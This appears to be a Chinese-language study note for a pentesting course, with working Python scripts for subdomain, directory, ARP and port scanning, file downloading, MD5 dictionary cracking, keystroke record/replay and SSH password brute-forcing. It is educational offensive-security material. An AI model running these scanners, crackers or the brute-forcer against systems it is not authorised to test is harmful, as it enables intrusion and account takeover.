基于渗透的python

Python for Pentesters

还记得开始学习编程的C,虽然淡忘,但思想仍在。

子域名枚举

requests 库

import pyfiglet
import requests
import sys 

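# Path to the subdomain wordlist, one label per line (e.g. "www", "mail").
# Left as a placeholder: open("") raises FileNotFoundError, so set it first.
dir_path = ""

# Seconds to wait per request. Without a timeout a single host that accepts
# TCP but never answers blocks the whole enumeration indefinitely.
REQUEST_TIMEOUT = 5


def clean_lines(lines):
    """Return *lines* with surrounding whitespace stripped and blank lines dropped."""
    stripped = (line.strip() for line in lines)
    return [line for line in stripped if line]


def load_wordlist(path):
    """Read the wordlist at *path* and return its non-empty entries."""
    with open(path, "r") as wordlist:
        return clean_lines(wordlist)


def host_responds(url, timeout=REQUEST_TIMEOUT):
    """Return True if an HTTP GET to *url* got any answer, False if it could not be reached.

    Any HTTP status (including 4xx/5xx) counts as "the name exists": the host
    resolved and accepted a connection. NXDOMAIN, refused connections and
    timeouts count as "does not exist".
    NOTE: a wildcard DNS record makes every candidate respond; probe a random
    label first before trusting the results.
    """
    try:
        requests.get(url, timeout=timeout)
    except requests.RequestException:
        # RequestException covers ConnectionError, Timeout, TooManyRedirects...
        # Catching only ConnectionError would let one slow host abort the scan.
        return False
    return True


def main():
    """CLI entry point: python3 script.py <domain>."""
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <domain>")
    domain = sys.argv[1]

    ascii_banner = pyfiglet.figlet_format("ABC-L")
    print(ascii_banner)

    for sub in load_wordlist(dir_path):
        sub_domains = f"http://{sub}.{domain}"
        if host_responds(sub_domains):
            print("Valid domain: ", sub_domains)


if __name__ == "__main__":
    main()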

目录枚举

还是用 requests 库

import requests
import sys
import pyfiglet

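# Path to the directory wordlist, one path component per line. Left as a
# placeholder: open('') raises FileNotFoundError, so set it before running.
path = ''

# Seconds to wait per request; without it one hung response stalls the scan.
REQUEST_TIMEOUT = 5


def read_wordlist(wordlist_path):
    """Return the non-empty, whitespace-stripped lines of the wordlist file."""
    with open(wordlist_path, 'r') as wordlist:
        entries = (entry.strip() for entry in wordlist)
        return [entry for entry in entries if entry]


def build_url(host, entry):
    """Return the URL probed for wordlist *entry* on *host* (plain http)."""
    return f"http://{host}/{entry}"


def fetch_status(url, timeout=REQUEST_TIMEOUT):
    """Return the HTTP status code for *url*, or None if the request failed.

    A failed request (refused, DNS error, timeout) must not abort the whole
    enumeration, so it is reported as None instead of raising.
    """
    try:
        return requests.get(url, timeout=timeout).status_code
    except requests.RequestException:
        return None


def main():
    """CLI entry point: python3 script.py <host>."""
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <host>")
    host = sys.argv[1]

    ascii_banner = pyfiglet.figlet_format("ABC-L")
    print(ascii_banner)

    for entry in read_wordlist(path):   # `entry`, not `dir`: don't shadow the builtin
        dir_enum = build_url(host, entry)
        status = fetch_status(dir_enum)
        # Only a hard 404 is treated as "missing". Servers that answer 200 with
        # a custom not-found page (soft 404) or 403 for everything will make
        # every entry look valid; compare response sizes if that happens.
        if status is None or status == 404:
            continue
        print("Valid directory:", dir_enum)


if __name__ == "__main__":
    main()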

网络扫描

from scapy.all import *
import pyfiglet

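interface = "eth0"
ip_range = "10.10.X.X/24"  # placeholder: replace X.X with the target network
broadcastMac = "ff:ff:ff:ff:ff:ff"


def arp_scan(targets=ip_range, iface=interface, timeout=2, inter=0.1):
    """Broadcast an ARP who-has for every address in *targets* and return the replies.

    Returns scapy's "answered" list of (sent, received) packet pairs.
    srp() transmits at layer 2, so this needs raw-socket privileges
    (root / CAP_NET_RAW) and only reaches hosts on the local segment.
    *inter* is the pause between packets; *timeout* bounds the wait for replies.
    """
    packet = Ether(dst=broadcastMac) / ARP(pdst=targets)
    answered, _unanswered = srp(packet, timeout=timeout, iface=iface, inter=inter)
    return answered


def main():
    """Print one "mac - ip" line per host that answered the ARP request."""
    ascii_banner = pyfiglet.figlet_format("ABC-L")
    print(ascii_banner)

    for _sent, received in arp_scan():
        print(received.sprintf(r"%Ether.src% - %ARP.psrc%"))


if __name__ == "__main__":
    main()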

端口扫描

socket 编程参考：https://www.cnblogs.com/-Lucky-/p/17039661.html

import sys
import socket
import pyfiglet

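# Seconds to wait for each TCP connect attempt.
PORT_TIMEOUT = 0.5


def probe_port(ip, port, timeout=PORT_TIMEOUT):
    """Return 0 if a TCP connect to (ip, port) succeeds, 1 otherwise.

    Keeps the connect_ex() convention (0 == success) used by the scan loop.
    Socket-level errors (e.g. an unresolvable host) are reported as 1 rather
    than raised so one bad probe cannot abort the scan.
    """
    try:
        # `with` closes the socket on every path, including a raised error.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            return 0 if sock.connect_ex((ip, port)) == 0 else 1
    except OSError:
        return 1


def scan_ports(ip, ports, timeout=PORT_TIMEOUT):
    """Return the ports from *ports* (in order) that accepted a TCP connection on *ip*."""
    return [port for port in ports if probe_port(ip, port, timeout) == 0]


def main():
    """CLI entry point: python3 script.py <ip>."""
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} <ip>")
    ip = sys.argv[1]

    ascii_banner = pyfiglet.figlet_format("ABC-L")
    print(ascii_banner)

    # range() excludes its upper bound: 65536 is needed to include port 65535.
    # The scan is sequential, so a host that silently drops packets costs
    # ~0.5 s per port (hours for a full sweep); narrow the range or add a
    # thread pool for real engagements.
    open_ports = scan_ports(ip, range(1, 65536))
    print(f"Open Ports:{open_ports}")


if __name__ == "__main__":
    main()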

文件下载器

Linux 系统上的 Wget 或 Windows 上的 Certutil 是下载文件的有用工具，下面用 requests 实现同样的功能。下载可执行工具（如 PSTools）后，应先核对官方发布的哈希或签名，再在目标上运行。

import requests

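url = 'https://assets.tryhackme.com/img/THMlogo.png'
# timeout: without it a silent server blocks the download forever.
r = requests.get(url, allow_redirects=True, timeout=30)
# Otherwise a 4xx/5xx error page would be saved to disk as if it were the image.
r.raise_for_status()
with open('THMlogo.png', 'wb') as out:
    out.write(r.content)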

import requests

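url = 'https://download.sysinternals.com/files/PSTools.zip'
# timeout: without it a silent server blocks the download forever.
# allow_redirects=True follows redirects blindly, including to another host;
# verify the archive's published hash/signature before running anything in it.
r = requests.get(url, allow_redirects=True, timeout=60)
# Otherwise a 4xx/5xx error page would be saved to disk as if it were the zip.
r.raise_for_status()
with open('PSTools.zip', 'wb') as out:
    out.write(r.content)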

hash破解

常用工具：john、hashcat。下面的脚本只演示最简单的 MD5 字典比对。

import hashlib
import pyfiglet

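def crack_hash(target_hash, candidates, algorithm='md5'):
    """Return the first candidate whose digest equals *target_hash*, or None.

    target_hash: hex digest as a string; it is stripped and lower-cased because
        hexdigest() is lowercase while pasted hashes are often upper-case.
    candidates: iterable of raw bytes lines (a file opened in 'rb' works);
        surrounding whitespace/newlines are stripped before hashing.
    algorithm: any name accepted by hashlib.new(); the script uses md5.
    Returns the stripped candidate as bytes.
    """
    wanted = target_hash.strip().lower()
    for raw in candidates:
        word = raw.strip()
        if hashlib.new(algorithm, word).hexdigest() == wanted:
            return word
    return None


def main():
    """Interactive entry point: prompt for a wordlist and an MD5 hash to match."""
    ascii_banner = pyfiglet.figlet_format("ABC-L")
    print(ascii_banner)

    wordlist_location = str(input('Enter wordlist file location: '))
    hash_input = str(input('Enter hash to be cracked: '))

    # Binary mode: real wordlists (rockyou etc.) contain non-UTF-8 bytes that
    # raise UnicodeDecodeError in text mode. Iterating the file handle streams
    # it instead of loading everything with readlines().
    with open(wordlist_location, 'rb') as file:
        match = crack_hash(hash_input, file)

    if match is None:
        print('Password not found in wordlist')
        raise SystemExit(1)
    print('Found cleartext password! ' + match.decode('utf-8', 'replace'))
    raise SystemExit(0)


if __name__ == "__main__":
    main()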

键盘记录器

import keyboard
# Capture every keyboard event until the Enter key is pressed, then feed the
# same events back with keyboard.play(). Nothing is written to disk or printed,
# so this is a record/replay demo rather than a logger.
# NOTE(review): on Linux the keyboard module typically needs root to read the
# input devices — confirm before relying on it.
recorded_events = keyboard.record(until='ENTER')
keyboard.play(recorded_events)

ssh暴力破解

常用工具：hydra。下面用 paramiko 演示 SSH 密码字典尝试。

import paramiko
import sys
import os

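def ssh_connect(target, username, password, timeout=10):
    """Try one SSH password login; return 0 on success, 1 if the credentials were rejected.

    Other failures (unreachable host, banner timeout, protocol error) propagate
    as exceptions so the caller can decide whether to continue.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts whatever host key the target presents. Acceptable
    # for an authorised test against a known box, but it means a MITM on the
    # path sees every password tried; pin the host key when you can.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(
            target,
            port=22,
            username=username,
            password=password,
            timeout=timeout,  # without it a filtered port hangs the whole run
            # Disable agent/key auth: otherwise paramiko may authenticate with a
            # local key and the current wordlist entry is reported as "found",
            # and each extra auth method burns one of the server's MaxAuthTries.
            allow_agent=False,
            look_for_keys=False,
        )
    except paramiko.AuthenticationException:
        return 1
    finally:
        # Close on every path; the original skipped close() when connect raised.
        ssh.close()
    return 0


def main():
    """Interactive entry point: prompt for target, username and a password file."""
    target = str(input('Please enter target IP address: '))
    username = str(input('Please enter username to bruteforce: '))
    password_file = str(input('Please enter location of the password file: '))

    # Iterate the handle to stream the file instead of readlines(); the `with`
    # block closes it, so no explicit close() is needed afterwards.
    with open(password_file, 'r') as file:
        for line in file:
            password = line.strip()
            try:
                response = ssh_connect(target, username, password)
            except Exception as e:
                # Connection-level failure (refused, timeout, fail2ban lockout):
                # report it and keep going, as a best-effort tool should.
                print(e)
                continue
            if response == 0:
                print('password found: '+ password)
                raise SystemExit(0)
            print('no luck')


if __name__ == "__main__":
    main()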